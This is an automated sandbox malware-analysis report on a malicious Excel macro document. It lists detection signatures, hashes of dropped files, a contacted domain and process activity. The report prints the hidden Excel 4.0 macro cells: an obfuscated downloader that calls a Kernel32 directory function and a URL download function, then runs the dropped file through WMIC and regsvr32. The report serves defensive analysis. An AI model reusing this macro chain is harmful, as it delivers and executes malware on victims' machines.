Analysis Report Documents (252).xlsm
Overview
General Information
Detection
Score: | 96 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Wmic Launch regsvr32 |
Source: | Author: Joe Security: |
Signature Overview |
---|
Source: | File opened: |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) |
Source: | Process created: |
Potential document exploit detected (performs DNS queries with low reputation score) |
Source: | DNS query: |
Source: | DNS query: |
Networking: |
---|
Office document connecting to suspicious TLD |
Source: | DNS traffic detected: |
Outdated Microsoft Office dropper detected |
Source: | DNS query: |
Performs DNS queries to domains with low reputation |
Source: | DNS query: |
Source: | DNS traffic detected: |
Source: | File created: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) |
Source: | Screenshot OCR: |
Source: | Screenshot OCR: |
Source: | Screenshot OCR: |
Source: | Screenshot OCR: |
Source: | Screenshot OCR: |
Source: | Screenshot OCR: |
Source: | Screenshot OCR: |
Source: | Screenshot OCR: |
Contains functionality to create processes via WMI |
Found Excel 4.0 Macro with suspicious formulas |
Source: | Initial sample: |
Found abnormal large hidden Excel 4.0 Macro sheet |
Source: | Initial sample: |
Source: | Binary string: |
Source: | Classification label: |
Source: | File created: |
Source: | File created: |
Source: | WMI Queries: |
Source: | File read: |
Source: | Key opened: |
Source: | Process created: |
Source: | Process created: |
Source: | Process created: |
Source: | Process created: |
Source: | Key value queried: |
Source: | Window detected: |
Source: | Initial sample: |
Source: | Initial sample: |
Source: | Initial sample: |
Source: | Key opened: |
Source: | File opened: |
Persistence and Installation Behavior: |
---|
Creates processes via WMI |
Source: | WMI Queries: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Thread sleep time: |
Source: | Key value queried: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Windows Management Instrumentation21 | Path Interception | Process Injection1 | Masquerading1 | OS Credential Dumping | Virtualization/Sandbox Evasion1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scripting21 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Exploitation for Client Execution31 | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion1 | Security Account Manager | System Information Discovery4 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting21 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Behavior Graph |
---|
Screenshots |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
 | 1% | Virustotal | | |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
 | 0% | Avira URL Cloud | safe | |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
xherzog24pv.xyz | unknown | unknown | true | | unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
 | | false | | low |
Contacted IPs |
---|
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 382991 |
Start date: | 07.04.2021 |
Start time: | 02:09:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 37s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | Documents (252).xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of new started processes analysed: | 7 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal96.troj.expl.evad.winXLSM@4/12@1/1 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
Cookbook Comments: |
Warnings: |
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
02:09:38 | API Interceptor |
Joe Sandbox View / Context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1028 |
Entropy (8bit): | 7.761039651897249 |
Encrypted: | false |
SSDEEP: | 24:OZYvitHj0T5rwDxmsYnNk56uCnIw2+ujc:O6vitHQT5rvn1ud+uA |
MD5: | 600F503BC1066BEB5FB5DD494AA1CD74 |
SHA1: | A504D5E687B98F9E0FD2896DFC8492DE0F974BE6 |
SHA-256: | B06BA2FAAAF371AE2F92D9047FFDAAF1933E03CFBC1E999E8B7CF378E33499C3 |
SHA-512: | B7D40CDCD4F442E8941947AF64343D8A06CA8C9710E74BE8E00245C5A67DF574ED243D2B988814843C0AD9483D7058EC355CE087665FFDA5C484CBDF8FD40E40 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 15644 |
Entropy (8bit): | 7.974497191204788 |
Encrypted: | false |
SSDEEP: | 384:EZRPEsXoz+jRHBbn1+3rhK0XwN8KHpy/c2C9NZ9ff:EZ6sYijj43VK0XwmKJ39Nnf |
MD5: | 29A9EE6FB5591751FC60ECD0FDB9478D |
SHA1: | D8A58D27A5D77416E1B882FDE001FE827EB0C1F5 |
SHA-256: | F2E6BD48ACC89A7DF730F5FE7FD0A19112FEF2C59BFEDF607996B1062337FC8F |
SHA-512: | 5465ABC4330E88D0490B5F61532B990859600F920D4ACA8F4A9013344B478EF51823D37E850ECF67829EEDFB80C00B6324EFE97DD175E56985C1AC07ED890AFE |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 677 |
Entropy (8bit): | 7.433026174405032 |
Encrypted: | false |
SSDEEP: | 12:6v/7RllfMXWaBlhV/Jk6gGPRRKyiaWH/LpR5PTQ6//blm1X+fZ8w5s7nP9Np971x:OZYZnDqkZiaOtnEuA1X+a0sL1L9cLUa6 |
MD5: | 55E8A29B221E51BE421B7D4F5F5F7E52 |
SHA1: | 117E73181FC9CDAA0904C6372D68EE48CEDC14E4 |
SHA-256: | B54D8571DB2F8FC570144F24EF7A42CE93FAB269AF166BF1234DBD2F96D86EB8 |
SHA-512: | 8592A133D815BBC225336F9149A4C89244CBCDEACC958470126DCD266DA8590C587D50D56A7F70771568C4D015BF55642DAAD6434F1C47E8BBBC4AB691694654 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 15644 |
Entropy (8bit): | 7.974497191204788 |
Encrypted: | false |
SSDEEP: | 384:EZRPEsXoz+jRHBbn1+3rhK0XwN8KHpy/c2C9NZ9ff:EZ6sYijj43VK0XwmKJ39Nnf |
MD5: | 29A9EE6FB5591751FC60ECD0FDB9478D |
SHA1: | D8A58D27A5D77416E1B882FDE001FE827EB0C1F5 |
SHA-256: | F2E6BD48ACC89A7DF730F5FE7FD0A19112FEF2C59BFEDF607996B1062337FC8F |
SHA-512: | 5465ABC4330E88D0490B5F61532B990859600F920D4ACA8F4A9013344B478EF51823D37E850ECF67829EEDFB80C00B6324EFE97DD175E56985C1AC07ED890AFE |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1028 |
Entropy (8bit): | 7.761039651897249 |
Encrypted: | false |
SSDEEP: | 24:OZYvitHj0T5rwDxmsYnNk56uCnIw2+ujc:O6vitHQT5rvn1ud+uA |
MD5: | 600F503BC1066BEB5FB5DD494AA1CD74 |
SHA1: | A504D5E687B98F9E0FD2896DFC8492DE0F974BE6 |
SHA-256: | B06BA2FAAAF371AE2F92D9047FFDAAF1933E03CFBC1E999E8B7CF378E33499C3 |
SHA-512: | B7D40CDCD4F442E8941947AF64343D8A06CA8C9710E74BE8E00245C5A67DF574ED243D2B988814843C0AD9483D7058EC355CE087665FFDA5C484CBDF8FD40E40 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 677 |
Entropy (8bit): | 7.433026174405032 |
Encrypted: | false |
SSDEEP: | 12:6v/7RllfMXWaBlhV/Jk6gGPRRKyiaWH/LpR5PTQ6//blm1X+fZ8w5s7nP9Np971x:OZYZnDqkZiaOtnEuA1X+a0sL1L9cLUa6 |
MD5: | 55E8A29B221E51BE421B7D4F5F5F7E52 |
SHA1: | 117E73181FC9CDAA0904C6372D68EE48CEDC14E4 |
SHA-256: | B54D8571DB2F8FC570144F24EF7A42CE93FAB269AF166BF1234DBD2F96D86EB8 |
SHA-512: | 8592A133D815BBC225336F9149A4C89244CBCDEACC958470126DCD266DA8590C587D50D56A7F70771568C4D015BF55642DAAD6434F1C47E8BBBC4AB691694654 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 279279 |
Entropy (8bit): | 7.646925449721352 |
Encrypted: | false |
SSDEEP: | 6144:5QUOipLbVxhmafLtkjY9s0npbXPygvjRNpd5uMDyi:5QUOipLbVxhmafLtkjY9s0npbXPyHMJ |
MD5: | BD358272AF7DAB33151195FF12D6217E |
SHA1: | CCC193B27AA91319B42770E4B668FAF7A7929DB6 |
SHA-256: | 08463109BCBBC2A7F8683207172DA2DE3A8473E8D4CBE39AB1744CE83D8E6012 |
SHA-512: | 0B5526CFFD77109335AC74E77475A78B4A8DCF9AC7B35A67F46115F71A81A7A8C1FAC06261C04B97ED6112608F12ADD4F7D39BC5C20B4A5E4324FAF535E1BD8E |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.478553609647248 |
Encrypted: | false |
SSDEEP: | 12:85QQncLgXg/XAlCPCHaXgzB8IB/4UKX+WnicvbPbDtZ3YilMMEpxRljKzTdJP9TK:85dnK/XTwz6IMYe/Dv3q6rNru/ |
MD5: | 835340709C9BFF9A87235BAEB59683B1 |
SHA1: | 0754C627E8564659FE9FB5373FDC2F130EE5CB5E |
SHA-256: | 0368C23B6D83D9BCEC16378A4E104A8CC2AFD0DA0CF5CFC78751943FC89C133D |
SHA-512: | CF31D804EA36B6AC64631F6C19BE45E8C03C684D3669BD76CAEE55CA489C8B77EC5B74ACD688C4868521097DD61BA8F177B7C9E8F770DE4854E63CA8161751A1 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 4176 |
Entropy (8bit): | 4.564390408570414 |
Encrypted: | false |
SSDEEP: | 96:8i/XLInkAm6Qh2i/XLInkAm6Qh2i/XLInkAm6Qh2i/XLInkAm6Q/:8wInkArQEwInkArQEwInkArQEwInkArg |
MD5: | B2ACE93FE976A321BFC3FD8E59A2B6A6 |
SHA1: | 93F2EB6AC0E1675C80834266AEB0FE694415CB66 |
SHA-256: | 22FEDE4E594CE2465437BAA9E7604556671CE3F8C4AC95C1B9272072A9543952 |
SHA-512: | 942CC4B55B31C338514ACBBD19F1103C8DA9333B2BB33155C4BA1BF179A4B271BB3DDCD8EB062B9F203806C3210943385FD854847FED39EEA71BDDA2A8A81155 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 208 |
Entropy (8bit): | 4.621699231260284 |
Encrypted: | false |
SSDEEP: | 6:dj/HXPiSGXPPHXPiSGXPPHXPiSGXPPHXPC:dTHFG3HFG3HFG3HK |
MD5: | EBF0A100F3CDA68735AABF46F42CEFEF |
SHA1: | 48CA8B0E2DD6FE5737EFA9DAA2F9BB055B72F9E0 |
SHA-256: | F86272101EB9CA0D4BB98DE814ADAAB3FF2891930B18A20BDDD8CDE3B55AF55B |
SHA-512: | C5CBA2A91FEBBAB5B2CB86901F9D8BB50DD720175CDFF25104F37D448B0B6CA43CD9D1F4D5068E7AFB4B9AD564A863EE4914E9ECB9EAF29CC2858DF55CC295A2 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 279279 |
Entropy (8bit): | 7.646925449721352 |
Encrypted: | false |
SSDEEP: | 6144:5QUOipLbVxhmafLtkjY9s0npbXPygvjRNpd5uMDyi:5QUOipLbVxhmafLtkjY9s0npbXPyHMJ |
MD5: | BD358272AF7DAB33151195FF12D6217E |
SHA1: | CCC193B27AA91319B42770E4B668FAF7A7929DB6 |
SHA-256: | 08463109BCBBC2A7F8683207172DA2DE3A8473E8D4CBE39AB1744CE83D8E6012 |
SHA-512: | 0B5526CFFD77109335AC74E77475A78B4A8DCF9AC7B35A67F46115F71A81A7A8C1FAC06261C04B97ED6112608F12ADD4F7D39BC5C20B4A5E4324FAF535E1BD8E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 495 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fj/FFDJw2fj/FFDJw2fV:vBFFGaFFGaFFGS |
MD5: | 98D7F9B901C91608CD7EA5509662BBCA |
SHA1: | F166635CE572B615A1D80076A1AE8DE9220473CF |
SHA-256: | F07A8B18E5B50003C42020241E82DDCCFBE254236AF2678C3CEFA4709100F4FE |
SHA-512: | 5536FD72C18081A1CFB46EB2E311BB257764C53B293E0D4B90F9C6C5EFB00E5A3A28190A2D04F3EE2819CF8DC7EBA7747DC8E8910C8716ACA7BAED0532142D1C |
Malicious: | true |
Preview: |
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.557820060670911 |
TrID: |
File name: | Documents (252).xlsm |
File size: | 210308 |
MD5: | 966c13f10fa0b3bfe75da87bca817396 |
SHA1: | 1769db2ec1d019b526e63637a413ceab10d00ff3 |
SHA256: | 963963dd218deb7e041b5a2ccf85a48c12d62bd2bdc248d6636b332f234cba14 |
SHA512: | e81cd50ab4b16286c51d62baba42170d4403947748d7d3ff4983588f9647b8912aa712fad263e9fd0119be04694d0d4ed8ad68f6d0b9d7b7ce06277e752e46e7 |
SSDEEP: | 1536:0jo+iv69kyln4llllllPtEEEEEEGl464S4A4jJ1rwsYijyKU2p9hYgryA:sLiC97l8Xf1LrDy2iE |
File Content Preview: | PK........E.yR................docProps/PK..........!..X..............docProps/app.xml.SAn.1..#q....'%.P.q.Z..@DJ..k.I,<.e.........,...0..?...$..W......l..ee..B...d8.I.V:... w....$.IX%..P..Dr._.`..<..!f(acA.).1.Q...q.c....J$,........|..&z........u...d.8... |
File Icon |
---|
Icon Hash: | e4e2aa8aa4bcbcac |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "Documents (252).xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
Non-empty cells of the hidden Excel 4.0 macro sheet, in sheet order (empty cells omitted, CSV quoting removed; runs of single-character cells are shown space-separated on one line):
=AC19()
=AA19()
=CALL(AC20,AD20,"JCJ",AE19,0)
=FORMULA.ARRAY(before.1.0.0.sheet!AK20&before.1.0.0.sheet!AK21&before.1.0.0.sheet!AK22&before.1.0.0.sheet!AK23&before.1.0.0.sheet!AK24&before.1.0.0.sheet!AK25&before.1.0.0.sheet!AK26&before.1.0.0.sheet!AK27,AC20)
=FORMULA.ARRAY(before.1.0.0.sheet!AL20&before.1.0.0.sheet!AL21&before.1.0.0.sheet!AL22&before.1.0.0.sheet!AL23&before.1.0.0.sheet!AL24&before.1.0.0.sheet!AL25&before.1.0.0.sheet!AL26&before.1.0.0.sheet!AL27&before.1.0.0.sheet!AL28&before.1.0.0.sheet!AL29&before.1.0.0.sheet!AL30&before.1.0.0.sheet!AL31&before.1.0.0.sheet!AL32&before.1.0.0.sheet!AL33&before.1.0.0.sheet!AL34&before.1.0.0.sheet!AL35,AD20)
C:/Users/Public
/dbhfr.xref
=FORMULA.ARRAY("A",before.1.0.0.sheet!AE20)
=CALL("UR"&before.1.0.0.sheet!AN21,before.1.0.0.sheet!AO20&before.1.0.0.sheet!AO21&before.1.0.0.sheet!AO22&before.1.0.0.sheet!AO23&before.1.0.0.sheet!AO24&before.1.0.0.sheet!AO25&before.1.0.0.sheet!AO26&before.1.0.0.sheet!AO27&before.1.0.0.sheet!AO28&before.1.0.0.sheet!AO29&before.1.0.0.sheet!AO30&before.1.0.0.sheet!AO31&before.1.0.0.sheet!AO32&before.1.0.0.sheet!AO33&before.1.0.0.sheet!AO34&before.1.0.0.sheet!AO35&before.1.0.0.sheet!AO36&before.1.0.0.sheet!AE20,AI27,0,A99,before.1.0.0.sheet!AE19&before.1.0.0.sheet!AF19,0,0)
Kernel32
CreateDirectoryA
A
K C U
=AF28()
=AD19()
=AG19()
=AA17()
e r LMon R
r e L
n a D
e t o
l e w
3 D n
JJCCBB 2 i l
=EXEC("wmic.exe "&" process call create 'regsvr32 -s "&AE19&AF19&"'")
r o
=HALT()
e a
c d
t T
o o
r F
y i
Network Behavior |
---|
Network Port Distribution |
---|
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 7, 2021 02:09:48.929415941 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 7, 2021 02:09:48.952637911 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 7, 2021 02:09:48.929415941 CEST | 192.168.2.22 | 8.8.8.8 | 0x26d4 | Standard query (0) | | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 7, 2021 02:09:48.952637911 CEST | 8.8.8.8 | 192.168.2.22 | 0x26d4 | Name error (3) | | none | none | A (IP address) | IN (0x0001) |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Memory Usage |
---|
High Level Behavior Distribution |
---|
Behavior |
---|
System Behavior |
---|
General |
---|
Start time: | 02:09:33 |
Start date: | 07/04/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f550000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 02:09:38 |
Start date: | 07/04/2021 |
Path: | C:\Windows\System32\wbem\WMIC.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff4f0000 |
File size: | 566272 bytes |
MD5 hash: | FD902835DEAEF4091799287736F3A028 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 02:09:38 |
Start date: | 07/04/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffa70000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|